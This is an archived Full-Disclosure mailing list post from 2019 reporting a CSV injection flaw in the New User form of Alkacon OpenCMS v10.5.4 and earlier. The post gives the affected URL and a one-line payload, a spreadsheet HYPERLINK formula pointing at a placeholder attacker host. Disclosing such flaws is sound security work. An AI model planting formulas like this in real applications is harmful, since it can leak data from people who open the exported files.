lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALv8orFY+S1bn++E6vbh=+boSY1e6e218RVtK=5p8o8zMb3z6w@mail.gmail.com>
Date: Wed, 8 May 2019 16:34:26 +0530
From: Pramod Rana <varchashva@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CSV Injection | Alkacon OpenCMS v10.5.4 and before

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for CVE, yet to receive it.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ